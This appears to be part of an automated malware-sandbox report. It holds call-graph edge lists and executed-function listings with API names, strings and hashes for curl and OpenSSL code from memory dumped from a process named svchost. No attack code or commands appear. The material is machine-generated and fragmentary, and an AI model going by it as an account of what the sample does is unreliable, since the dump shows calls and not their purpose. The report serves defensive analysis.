81521->81522 81522->81500 81524 7ffbaafce653 ctype 81523->81524 81525 7ffbaafce625 81523->81525 81524->81356 81525->81524 81526 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81525->81526 81527 7ffbaafce69a ctype 81526->81527 81527->81356 81529 7ffbaafc3ff0 std::_Throw_Cpp_error 104 API calls 81528->81529 81538 7ffbaafe8090 _Strcoll 81529->81538 81530 7ffbaafe8255 ctype 81531 7ffbab03b0f0 __std_fs_get_file_attributes_by_handle 8 API calls 81530->81531 81533 7ffbaafe6a31 81531->81533 81532 7ffbaafe8281 81534 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81532->81534 81533->81380 81550 7ffbaafe8390 81533->81550 81535 7ffbaafe8286 81534->81535 81540 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81535->81540 81536 7ffbaafe81b1 81539 7ffbaafe828c 81536->81539 81542 7ffbaafc3ff0 std::_Throw_Cpp_error 104 API calls 81536->81542 81537 7ffbaafe812b 81537->81539 81543 7ffbaafc3ff0 std::_Throw_Cpp_error 104 API calls 81537->81543 81538->81536 81538->81537 81549 7ffbaafe8166 ctype 81538->81549 81669 7ffbaafc5f90 104 API calls 81539->81669 81540->81539 81545 7ffbaafe81e2 81542->81545 81546 7ffbaafe8159 81543->81546 81547 7ffbaafce610 102 API calls 81545->81547 81548 7ffbaafce610 102 API calls 81546->81548 81547->81549 81548->81549 81549->81530 81549->81532 81549->81535 81551 7ffbaafe83cb 81550->81551 81585 7ffbaafe873d ctype 81550->81585 81670 7ffbaafe82a0 81551->81670 81554 7ffbab03b0f0 __std_fs_get_file_attributes_by_handle 8 API calls 81555 7ffbaafe87c6 81554->81555 81555->81372 81556 7ffbaafd8370 104 API calls 81557 7ffbaafe8476 81556->81557 81558 7ffbaafe87de 81557->81558 81570 7ffbaafe84c2 _Strcoll ctype 81557->81570 81559 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81558->81559 81560 7ffbaafe87e3 81559->81560 81564 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81560->81564 81561 7ffbaafe875f 81562 7ffbaafe87ef 81561->81562 81561->81585 81563 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81562->81563 81565 7ffbaafe87f5 81563->81565 81566 7ffbaafe87e9 81564->81566 81567 7ffbaafe881f 81565->81567 81568 7ffbaafe880d curl_global_init 81565->81568 81569 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81566->81569 81567->81372 81568->81567 81569->81562 81570->81561 81571 7ffbaafc3ff0 std::_Throw_Cpp_error 104 API calls 81570->81571 81572 7ffbaafe8619 81571->81572 81677 7ffbaafeac90 105 API calls 5 library calls 81572->81677 81574 7ffbaafe862b 81678 7ffbaafe8ad0 105 API calls 2 library calls 81574->81678 81576 7ffbaafe8633 81577 7ffbaafc3ff0 std::_Throw_Cpp_error 104 API calls 81576->81577 81578 7ffbaafe865f 81577->81578 81679 7ffbaafeac90 105 API calls 5 library calls 81578->81679 81580 7ffbaafe866c 81680 7ffbaaff25f0 105 API calls Concurrency::cancel_current_task 81580->81680 81582 7ffbaafe869d 81583 7ffbaafce610 102 API calls 81582->81583 81584 7ffbaafe86ab 81583->81584 81584->81560 81586 7ffbaafe86e3 ctype 81584->81586 81585->81554 81586->81566 81586->81585 81588 7ffbaafc3ff0 std::_Throw_Cpp_error 104 API calls 81587->81588 81594 7ffbaafe7da6 _Strcoll 81588->81594 81589 7ffbaafe7ff2 ctype 81590 7ffbab03b0f0 __std_fs_get_file_attributes_by_handle 8 API calls 81589->81590 81592 7ffbaafe6a8d 81590->81592 81591 7ffbaafe801b 81593 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81591->81593 81592->81378 81592->81380 81595 7ffbaafe8020 81593->81595 81596 7ffbaafe7e28 81594->81596 81597 7ffbaafe7e87 81594->81597 81618 7ffbaafe7e44 ctype 81594->81618 81599 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81595->81599 81733 7ffbaafe9560 104 API calls 4 library calls 81596->81733 81600 7ffbaafe8026 81597->81600 81605 7ffbaafc3ff0 std::_Throw_Cpp_error 104 API calls 81597->81605 81599->81600 81736 7ffbaafc5f90 104 API calls 81600->81736 81601 7ffbaafe7e38 81603 7ffbaafce610 102 API calls 81601->81603 81603->81618 81604 7ffbaafe802c 81607 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81604->81607 81606 7ffbaafe7ec3 81605->81606 81734 7ffbaafe9560 104 API calls 4 library calls 81606->81734 81610 7ffbaafe8032 81607->81610 81609 7ffbaafe7ed4 81735 7ffbaafeaee0 104 API calls 4 library calls 81609->81735 81613 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81610->81613 81612 7ffbaafe7ee9 81614 7ffbaafce610 102 API calls 81612->81614 81615 7ffbaafe8038 81613->81615 81614->81618 81616 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81615->81616 81617 7ffbaafe803e 81616->81617 81618->81589 81618->81591 81618->81595 81618->81604 81618->81610 81618->81615 81619->81399 81620->81418 81621->81417 81622->81416 81623->81426 81625->81473 81626->81473 81627->81473 81629 7ffbaafe7abf 81628->81629 81630 7ffbaafe7ac2 curl_easy_setopt curl_easy_setopt curl_easy_setopt curl_easy_setopt curl_easy_setopt 81628->81630 81629->81630 81632 7ffbaafe7b43 curl_easy_setopt 81630->81632 81636 7ffbaafe7b94 curl_easy_setopt curl_easy_perform 81632->81636 81634 7ffbaafe7c99 81637 7ffbaafc56a0 std::_Throw_Cpp_error 104 API calls 81634->81637 81635 7ffbaafe7bdc curl_easy_strerror 81638 7ffbaafe7c00 81635->81638 81636->81634 81636->81635 81642 7ffbaafe7c17 81637->81642 81638->81638 81639 7ffbaafc3ff0 std::_Throw_Cpp_error 104 API calls 81638->81639 81639->81642 81640 7ffbab03b0f0 __std_fs_get_file_attributes_by_handle 8 API calls 81643 7ffbaafe7c85 81640->81643 81641 7ffbaafe7c70 ctype 81641->81640 81642->81641 81644 7ffbaafe7cde 81642->81644 81643->81492 81645 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81644->81645 81646 7ffbaafe7ce3 81645->81646 81649 7ffbaafe4270 81646->81649 81648 7ffbaafe7d0b 81648->81492 81650 7ffbaafe42b5 81649->81650 81653 7ffbaafe42ca 81650->81653 81667 7ffbaafc8700 8 API calls __std_fs_get_file_attributes_by_handle 81650->81667 81651 7ffbaafe4300 81654 7ffbaafe4371 81651->81654 81656 7ffbaafe43b4 81651->81656 81653->81651 81663 7ffbaafe37c0 81653->81663 81655 7ffbaafe4382 81654->81655 81668 7ffbaafc8860 104 API calls Concurrency::cancel_current_task 81654->81668 81655->81648 81658 7ffbaafc2570 104 API calls 81656->81658 81659 7ffbaafe43f6 81658->81659 81660 7ffbab03d5f0 Concurrency::cancel_current_task 2 API calls 81659->81660 81661 7ffbaafe4407 81660->81661 81661->81648 81664 7ffbaafe3863 memcpy_s 81663->81664 81665 7ffbaafe37e8 memcpy_s 81663->81665 81664->81665 81666 7ffbab04e94c 104 API calls 81664->81666 81665->81651 81666->81665 81667->81653 81668->81655 81681 7ffbaafe8870 81670->81681 81672 7ffbaafe82dd 81709 7ffbaafeddc0 81672->81709 81674 7ffbaafe830d 81675 7ffbab03b0f0 __std_fs_get_file_attributes_by_handle 8 API calls 81674->81675 81676 7ffbaafe8381 81675->81676 81676->81556 81676->81585 81677->81574 81678->81576 81679->81580 81680->81582 81682 7ffbab0389d4 107 API calls 81681->81682 81683 7ffbaafe88b3 81682->81683 81684 7ffbab03841c std::_Lockit::_Lockit 103 API calls 81683->81684 81685 7ffbaafe88c3 81684->81685 81686 7ffbab03841c std::_Lockit::_Lockit 103 API calls 81685->81686 81692 7ffbaafe8912 81685->81692 81687 7ffbaafe88e8 81686->81687 81690 7ffbab038494 std::_Lockit::~_Lockit LeaveCriticalSection 81687->81690 81688 7ffbab038494 std::_Lockit::~_Lockit LeaveCriticalSection 81691 7ffbaafe89a4 81688->81691 81689 7ffbaafe895b 81689->81688 81690->81692 81694 7ffbaafc6150 137 API calls 81691->81694 81692->81689 81725 7ffbaafea420 131 API calls 7 library calls 81692->81725 81696 7ffbaafe89b1 81694->81696 81695 7ffbaafe896e 81697 7ffbaafe8978 81695->81697 81698 7ffbaafe8a01 81695->81698 81727 7ffbaafe98f0 104 API calls 4 library calls 81696->81727 81726 7ffbab038990 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 81697->81726 81728 7ffbaafc1fc0 104 API calls 2 library calls 81698->81728 81702 7ffbaafe89d8 81704 7ffbab03b0f0 __std_fs_get_file_attributes_by_handle 8 API calls 81702->81704 81703 7ffbaafe8a4a ctype 81703->81672 81705 7ffbaafe89e9 81704->81705 81705->81672 81706 7ffbaafe8a06 81706->81703 81707 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81706->81707 81708 7ffbaafe8a6a ctype 81707->81708 81710 7ffbaafeddff 81709->81710 81713 7ffbaafede06 memcpy_s 81709->81713 81711 7ffbab03b0f0 __std_fs_get_file_attributes_by_handle 8 API calls 81710->81711 81712 7ffbaafedf1a 81711->81712 81712->81674 81729 7ffbaaff2d10 104 API calls memcpy_s 81713->81729 81715 7ffbaafedeae 81716 7ffbaafedee6 ctype 81715->81716 81718 7ffbaafedf37 81715->81718 81730 7ffbaaff10b0 102 API calls 2 library calls 81716->81730 81720 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81718->81720 81719 7ffbaafedf01 81731 7ffbaaff10b0 102 API calls 2 library calls 81719->81731 81723 7ffbaafedf3c 81720->81723 81732 7ffbab049714 102 API calls _Getctype 81723->81732 81724 7ffbaafee06a 81724->81674 81725->81695 81726->81689 81727->81702 81728->81706 81729->81715 81730->81719 81731->81710 81732->81724 81733->81601 81734->81609 81735->81612 81737 7ffbaaffd9d0 81738 7ffbaaffd9e9 81737->81738 81739 7ffbaafc3fa0 104 API calls 81738->81739 81740 7ffbaaffd9fe 81739->81740 81751 7ffbaafdf6c0 81740->81751 81742 7ffbaaffda20 81743 7ffbab03d5f0 Concurrency::cancel_current_task 2 API calls 81742->81743 81745 7ffbaaffda31 81743->81745 81744 7ffbaaffdc8e ctype 81745->81744 81746 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81745->81746 81748 7ffbaaffdcb2 81746->81748 81747 7ffbaaffddf1 ctype 81748->81747 81749 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81748->81749 81750 7ffbaaffde15 81749->81750 81752 7ffbaafc56a0 std::_Throw_Cpp_error 104 API calls 81751->81752 81753 7ffbaafdf6e3 81752->81753 81754 7ffbaafc1a10 std::_Throw_Cpp_error 102 API calls 81753->81754 81755 7ffbaafdf708 ctype 81754->81755 81756 7ffbaafc53a0 104 API calls 81755->81756 81757 7ffbaafdf838 81755->81757 81758 7ffbaafdf762 81756->81758 81759 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81757->81759 81765 7ffbaafdf980 81758->81765 81760 7ffbaafdf83e 81759->81760 81762 7ffbaafdf81f ctype 81762->81742 81763 7ffbaafdf7e5 81763->81762 81764 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81763->81764 81764->81757 81807 7ffbab03943c 103 API calls __std_fs_code_page 81765->81807 81767 7ffbaafdf9e4 81808 7ffbaafe4d10 110 API calls 81767->81808 81769 7ffbaafdfa19 81809 7ffbaafe4d10 110 API calls 81769->81809 81771 7ffbaafdfa4c 81772 7ffbaafdfa86 81771->81772 81810 7ffbaafd72f0 104 API calls 5 library calls 81771->81810 81811 7ffbaafc5c70 104 API calls memcpy_s 81772->81811 81775 7ffbaafdfa99 81812 7ffbaafc5c70 104 API calls memcpy_s 81775->81812 81777 7ffbaafdfaae 81813 7ffbaafc5c70 104 API calls memcpy_s 81777->81813 81779 7ffbaafdfac8 81780 7ffbaafdfafb 81779->81780 81814 7ffbaafc5c70 104 API calls memcpy_s 81779->81814 81784 7ffbaafdfb08 ctype 81780->81784 81816 7ffbaafe5650 105 API calls 5 library calls 81780->81816 81783 7ffbaafdfae1 81815 7ffbaafc5c70 104 API calls memcpy_s 81783->81815 81786 7ffbaafdfbb3 ctype 81784->81786 81787 7ffbaafdfbe8 81784->81787 81791 7ffbaafdfbe3 81784->81791 81788 7ffbab03b0f0 __std_fs_get_file_attributes_by_handle 8 API calls 81786->81788 81790 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81787->81790 81789 7ffbaafdfbc7 81788->81789 81789->81763 81794 7ffbaafdfbee ctype 81790->81794 81792 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81791->81792 81792->81787 81793 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81797 7ffbaafdfd31 ctype 81793->81797 81794->81793 81795 7ffbaafdfcdb __std_exception_destroy ctype 81794->81795 81795->81763 81796 7ffbab049cd4 _invalid_parameter_noinfo_noreturn 102 API calls 81798 7ffbaafdfe5e 81796->81798 81797->81796 81799 7ffbab03d1bc __std_exception_copy 102 API calls 81798->81799 81800 7ffbaafdfe92 81799->81800 81801 7ffbaafc53a0 104 API calls 81800->81801 81802 7ffbaafdfebb 81801->81802 81803 7ffbaafc53a0 104 API calls 81802->81803 81804 7ffbaafdfec9 81803->81804 81805 7ffbaafc56a0 std::_Throw_Cpp_error 104 API calls 81804->81805 81806 7ffbaafdfed7 81805->81806 81806->81763 81807->81767 81808->81769 81809->81771 81810->81772 81811->81775 81812->81777 81813->81779 81814->81783 81815->81780 81816->81784 81817 7ffbaafe96f0 81818 7ffbaafe5fe0 2 API calls 81817->81818 81819 7ffbaafe9703 81818->81819 81820 7ffbaafe9761 81819->81820 81823 7ffbaafe9748 81819->81823 81821 7ffbaafedcf0 6 API calls 81820->81821 81822 7ffbaafe9770 81821->81822 81824 7ffbaafedcf0 6 API calls 81823->81824 81825 7ffbaafe975b 81824->81825

                                                                                              Executed Functions

                                                                                              Function 00007FFBAB4242D0 Relevance: 79.1, APIs: 43, Strings: 2, Instructions: 322COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 7ffbab4242d0-7ffbab42431e call 7ffbab49edf0 * 2 6 7ffbab424320-7ffbab424350 ERR_new ERR_set_debug ERR_set_error 0->6 7 7ffbab424355-7ffbab42436d call 7ffbab422f50 0->7 8 7ffbab424887-7ffbab42489a 6->8 11 7ffbab42487b 7->11 12 7ffbab424373-7ffbab42437a call 7ffbab41bff0 7->12 13 7ffbab42487d-7ffbab424882 11->13 16 7ffbab42437c-7ffbab42439e ERR_new ERR_set_debug 12->16 17 7ffbab4243a3-7ffbab4243c0 CRYPTO_zalloc 12->17 13->8 18 7ffbab424867-7ffbab42486e ERR_set_error 16->18 17->11 19 7ffbab4243c6-7ffbab4243df CRYPTO_THREAD_lock_new 17->19 20 7ffbab424873-7ffbab424876 call 7ffbab423a70 18->20 21 7ffbab4243e1-7ffbab4243e6 ERR_new 19->21 22 7ffbab424408-7ffbab42440e 19->22 20->11 24 7ffbab4243eb-7ffbab424403 ERR_set_debug 21->24 25 7ffbab424410-7ffbab42442f CRYPTO_strdup 22->25 26 7ffbab424435-7ffbab4244b9 OPENSSL_LH_new OPENSSL_LH_set_thunks 22->26 24->18 25->20 25->26 28 7ffbab4244bb-7ffbab4244c5 ERR_new 26->28 29 7ffbab4244ca-7ffbab4244d6 X509_STORE_new 26->29 28->24 30 7ffbab4244ff-7ffbab424514 call 7ffbab49e78e 29->30 31 7ffbab4244d8-7ffbab4244fa ERR_new ERR_set_debug 29->31 34 7ffbab42453d-7ffbab424547 call 7ffbab420eb0 30->34 35 7ffbab424516-7ffbab424538 ERR_new ERR_set_debug 30->35 31->18 38 7ffbab424570-7ffbab42457a call 7ffbab439f30 34->38 39 7ffbab424549-7ffbab42454e ERR_new 34->39 35->18 43 7ffbab42457c-7ffbab424586 ERR_new 38->43 44 7ffbab424588-7ffbab424592 call 7ffbab43a030 38->44 41 7ffbab424553-7ffbab42456b ERR_set_debug 39->41 41->18 43->41 47 7ffbab4245a0-7ffbab4245aa call 7ffbab43a8b0 44->47 48 7ffbab424594-7ffbab42459e ERR_new 44->48 51 7ffbab4245ac-7ffbab4245b6 ERR_new 47->51 52 7ffbab4245b8-7ffbab4245ca call 7ffbab41df60 call 7ffbab41e900 47->52 48->41 51->41 57 7ffbab4245cc-7ffbab4245d6 ERR_new 52->57 58 7ffbab4245db-7ffbab4245f8 call 7ffbab41d360 52->58 57->41 61 7ffbab4245fa-7ffbab424604 ERR_new 58->61 62 7ffbab424609-7ffbab42462f call 7ffbab41df50 call 7ffbab4202b0 58->62 61->41 67 7ffbab424845-7ffbab424862 ERR_new ERR_set_debug 62->67 68 7ffbab424635-7ffbab424640 OPENSSL_sk_num 62->68 67->18 68->67 69 7ffbab424646-7ffbab424655 call 7ffbab49e6a4 68->69 72 7ffbab424666-7ffbab4246a3 call 7ffbab42ef20 * 2 OPENSSL_sk_new_null 69->72 73 7ffbab424657-7ffbab42465c ERR_new 69->73 78 7ffbab4246b4-7ffbab4246c3 OPENSSL_sk_new_null 72->78 79 7ffbab4246a5-7ffbab4246aa ERR_new 72->79 73->72 80 7ffbab4246d4-7ffbab4246ea CRYPTO_new_ex_data 78->80 81 7ffbab4246c5-7ffbab4246ca ERR_new 78->81 79->78 82 7ffbab4246ec-7ffbab4246f1 ERR_new 80->82 83 7ffbab4246fb-7ffbab42471c call 7ffbab49e5e4 80->83 81->80 82->83 83->20 86 7ffbab424722-7ffbab42472d 83->86 87 7ffbab42473b-7ffbab424769 RAND_bytes_ex 86->87 88 7ffbab42472f-7ffbab424734 call 7ffbab41e880 86->88 90 7ffbab42476b-7ffbab424783 RAND_priv_bytes_ex 87->90 91 7ffbab4247a3 87->91 88->87 90->91 93 7ffbab424785-7ffbab4247a1 RAND_priv_bytes_ex 90->93 94 7ffbab4247ae-7ffbab4247c6 RAND_priv_bytes_ex 91->94 93->91 93->94 95 7ffbab4247ec-7ffbab4247f6 call 7ffbab4441f0 94->95 96 7ffbab4247c8-7ffbab4247ea ERR_new ERR_set_debug 94->96 99 7ffbab4247f8-7ffbab4247fd ERR_new 95->99 100 7ffbab424807-7ffbab424843 call 7ffbab4304f0 95->100 96->18 99->100 100->13
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error
                                                                                              • String ID: SSL_CTX_new_ex$ssl\ssl_lib.c
                                                                                              • API String ID: 1552677711-2988157636
                                                                                              • Opcode ID: e9777b34945a6ee12517b1d0900e39796eb2601d2fed10fadf22a14d78122077
                                                                                              • Instruction ID: 55151855714dcd1d97cb480d6770e669926a02b9b5ad4ce16a6ff9896d5aa7d2
                                                                                              • Opcode Fuzzy Hash: e9777b34945a6ee12517b1d0900e39796eb2601d2fed10fadf22a14d78122077
                                                                                              • Instruction Fuzzy Hash: 8CE15CA1A0FA8381FB62AB72D4923F92291EF44784F44C035DE6D466EAEE3CE5459311
                                                                                              Function 00007FFBAB420EB0 Relevance: 65.1, APIs: 23, Strings: 14, Instructions: 313COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 103 7ffbab420eb0-7ffbab420eeb call 7ffbab49edf0 106 7ffbab420ef0-7ffbab420ef5 103->106 107 7ffbab420f16-7ffbab420f22 106->107 108 7ffbab420ef7-7ffbab420f01 call 7ffbab42ee40 106->108 107->106 110 7ffbab420f24-7ffbab420f3c 107->110 111 7ffbab420f06-7ffbab420f0c 108->111 112 7ffbab420f40-7ffbab420f59 call 7ffbab42ef20 110->112 111->107 113 7ffbab420f0e-7ffbab420f10 111->113 116 7ffbab420f5b-7ffbab420f63 112->116 117 7ffbab420f65-7ffbab420f6f EVP_MD_get_size 112->117 113->107 118 7ffbab420f7a-7ffbab420f89 116->118 119 7ffbab4213ae-7ffbab4213c0 117->119 120 7ffbab420f75-7ffbab420f77 117->120 118->112 121 7ffbab420f8b-7ffbab420fb0 ERR_set_mark EVP_SIGNATURE_fetch 118->121 120->118 122 7ffbab420fbb-7ffbab420fbe call 7ffbab49e524 121->122 123 7ffbab420fb2-7ffbab420fb9 121->123 125 7ffbab420fc3-7ffbab420fdc EVP_KEYEXCH_fetch 122->125 123->125 126 7ffbab420fde-7ffbab420fe8 125->126 127 7ffbab420fea-7ffbab420fed call 7ffbab49e530 125->127 128 7ffbab420ff2-7ffbab42100b EVP_KEYEXCH_fetch 126->128 127->128 130 7ffbab42100d-7ffbab421017 128->130 131 7ffbab421019-7ffbab42101c EVP_KEYEXCH_free 128->131 132 7ffbab421021-7ffbab42103a EVP_SIGNATURE_fetch 130->132 131->132 133 7ffbab42103c-7ffbab421043 132->133 134 7ffbab421045-7ffbab421048 EVP_SIGNATURE_free 132->134 135 7ffbab42104d-7ffbab4210ad ERR_pop_to_mark EVP_PKEY_asn1_find_str 133->135 134->135 136 7ffbab4210af-7ffbab4210cc EVP_PKEY_asn1_get0_info 135->136 137 7ffbab4210d2-7ffbab4210e6 call 7ffbab443eb0 135->137 136->137 138 7ffbab4210ce 136->138 141 7ffbab4210f5 137->141 142 7ffbab4210e8-7ffbab4210f3 137->142 138->137 143 7ffbab4210fc-7ffbab42111d EVP_PKEY_asn1_find_str 141->143 142->143 144 7ffbab42111f-7ffbab42113c EVP_PKEY_asn1_get0_info 143->144 145 7ffbab421142-7ffbab421156 call 7ffbab443eb0 143->145 144->145 146 7ffbab42113e 144->146 149 7ffbab421165 145->149 150 7ffbab421158-7ffbab421163 145->150 146->145 151 7ffbab42116f-7ffbab421190 EVP_PKEY_asn1_find_str 149->151 150->151 152 7ffbab421192-7ffbab4211af EVP_PKEY_asn1_get0_info 151->152 153 7ffbab4211b5-7ffbab4211c9 call 7ffbab443eb0 151->153 152->153 154 7ffbab4211b1 152->154 157 7ffbab4211cb-7ffbab4211d6 153->157 158 7ffbab4211d8 153->158 154->153 159 7ffbab4211e2-7ffbab421203 EVP_PKEY_asn1_find_str 157->159 158->159 160 7ffbab421205-7ffbab421222 EVP_PKEY_asn1_get0_info 159->160 161 7ffbab421228-7ffbab42123c call 7ffbab443eb0 159->161 160->161 162 7ffbab421224 160->162 165 7ffbab42124b 161->165 166 7ffbab42123e-7ffbab421249 161->166 162->161 167 7ffbab421255-7ffbab421276 EVP_PKEY_asn1_find_str 165->167 166->167 168 7ffbab42129b-7ffbab4212a8 call 7ffbab443eb0 167->168 169 7ffbab421278-7ffbab421295 EVP_PKEY_asn1_get0_info 167->169 173 7ffbab4212b4-7ffbab4212d5 EVP_PKEY_asn1_find_str 168->173 174 7ffbab4212aa 168->174 169->168 170 7ffbab421297 169->170 170->168 175 7ffbab4212d7-7ffbab4212f4 EVP_PKEY_asn1_get0_info 173->175 176 7ffbab4212fa-7ffbab421307 call 7ffbab443eb0 173->176 174->173 175->176 177 7ffbab4212f6 175->177 180 7ffbab421313-7ffbab421334 EVP_PKEY_asn1_find_str 176->180 181 7ffbab421309 176->181 177->176 182 7ffbab421336-7ffbab421353 EVP_PKEY_asn1_get0_info 180->182 183 7ffbab421359-7ffbab421366 call 7ffbab443eb0 180->183 181->180 182->183 184 7ffbab421355 182->184 187 7ffbab421372-7ffbab421381 183->187 188 7ffbab421368 183->188 184->183 189 7ffbab421383 187->189 190 7ffbab42138a-7ffbab42138c 187->190 188->187 189->190 191 7ffbab42138e 190->191 192 7ffbab421398-7ffbab4213ad 190->192 191->192
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Y_asn1_find_strY_asn1_get0_info$E_fetchH_fetchR_pop_to_markR_set_mark$D_get_sizeE_freeH_freeJ_nid2snR_fetch
                                                                                              • String ID: $ $ $ $DSA$ECDH$ECDSA$gost-mac$gost-mac-12$gost2001$gost2012_256$gost2012_512$kuznyechik-mac$magma-mac
                                                                                              • API String ID: 2321393641-365409564
                                                                                              • Opcode ID: 268b19889cf02bf0f91517eb74db770bd30f83b64ba60b829bfd315cebd91123
                                                                                              • Instruction ID: 0c377516c2df7c095879a843b90ab41273efd517c93d83f1b95fa7e1ae88f128
                                                                                              • Opcode Fuzzy Hash: 268b19889cf02bf0f91517eb74db770bd30f83b64ba60b829bfd315cebd91123
                                                                                              • Instruction Fuzzy Hash: 1CE1D2B2A06B9286F762CF30D481AB937E0FB44758F049139FE5D466A9EF39E484D700
                                                                                              Function 00007FFBAB42DAA0 Relevance: 56.4, APIs: 29, Strings: 3, Instructions: 384COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 193 7ffbab42daa0-7ffbab42dad4 call 7ffbab49edf0 CRYPTO_zalloc 196 7ffbab42dade-7ffbab42db01 CRYPTO_THREAD_lock_new 193->196 197 7ffbab42dad6-7ffbab42dadd 193->197 198 7ffbab42db2d-7ffbab42db42 CRYPTO_free 196->198 199 7ffbab42db03-7ffbab42db1a CRYPTO_new_ex_data 196->199 202 7ffbab42db45-7ffbab42db76 ERR_new ERR_set_debug ERR_set_error 198->202 200 7ffbab42dbe1-7ffbab42dc25 call 7ffbab46fe80 199->200 201 7ffbab42db20-7ffbab42db29 CRYPTO_THREAD_lock_free 199->201 209 7ffbab42dc3f-7ffbab42dc9e OPENSSL_sk_dup 200->209 210 7ffbab42dc27-7ffbab42dc39 200->210 201->198 204 7ffbab42dbc8 202->204 205 7ffbab42db78-7ffbab42db82 202->205 206 7ffbab42dbca-7ffbab42dbe0 204->206 205->204 208 7ffbab42db84-7ffbab42db99 CRYPTO_free_ex_data 205->208 211 7ffbab42db9b 208->211 212 7ffbab42dba1-7ffbab42dbc3 call 7ffbab423a70 CRYPTO_THREAD_lock_free CRYPTO_free 208->212 213 7ffbab42dca0-7ffbab42dcce ERR_new ERR_set_debug ERR_set_error 209->213 214 7ffbab42dcd3-7ffbab42dce9 call 7ffbab41cb70 209->214 210->209 211->212 212->204 213->205 214->202 219 7ffbab42dcef-7ffbab42dd6d 214->219 219->205 220 7ffbab42dd73-7ffbab42ddba X509_VERIFY_PARAM_new 219->220 221 7ffbab42ddbc-7ffbab42ddea ERR_new ERR_set_debug ERR_set_error 220->221 222 7ffbab42ddef-7ffbab42de07 X509_VERIFY_PARAM_inherit call 7ffbab45aa30 220->222 221->205 225 7ffbab42de1c 222->225 226 7ffbab42de09-7ffbab42de12 call 7ffbab45aa40 222->226 228 7ffbab42de1e-7ffbab42de2a call 7ffbab45aa30 225->228 226->225 231 7ffbab42de14-7ffbab42de1a 226->231 233 7ffbab42de2c-7ffbab42de35 call 7ffbab45aa40 228->233 234 7ffbab42de44-7ffbab42ded6 228->234 231->228 233->234 247 7ffbab42de37-7ffbab42de3e 233->247 236 7ffbab42df17-7ffbab42df21 234->236 237 7ffbab42ded8-7ffbab42defb CRYPTO_memdup 234->237 240 7ffbab42df65-7ffbab42df73 236->240 241 7ffbab42df23-7ffbab42df49 CRYPTO_memdup 236->241 238 7ffbab42defd-7ffbab42df04 237->238 239 7ffbab42df09-7ffbab42df10 237->239 238->205 239->236 245 7ffbab42df75-7ffbab42df98 CRYPTO_malloc 240->245 246 7ffbab42dfca-7ffbab42e003 call 7ffbab45aa30 240->246 243 7ffbab42df4b-7ffbab42df52 241->243 244 7ffbab42df57-7ffbab42df5e 241->244 243->205 244->240 248 7ffbab42dfa6-7ffbab42dfc3 memcpy 245->248 249 7ffbab42df9a-7ffbab42dfa1 245->249 252 7ffbab42e02c-7ffbab42e034 246->252 253 7ffbab42e005-7ffbab42e00e call 7ffbab45aa40 246->253 247->234 248->246 249->205 252->202 258 7ffbab42e03a-7ffbab42e055 252->258 253->252 257 7ffbab42e010-7ffbab42e025 253->257 257->252 258->202 260 7ffbab42e05b-7ffbab42e0c0 258->260 261 7ffbab42e0c2-7ffbab42e0e5 CRYPTO_memdup 260->261 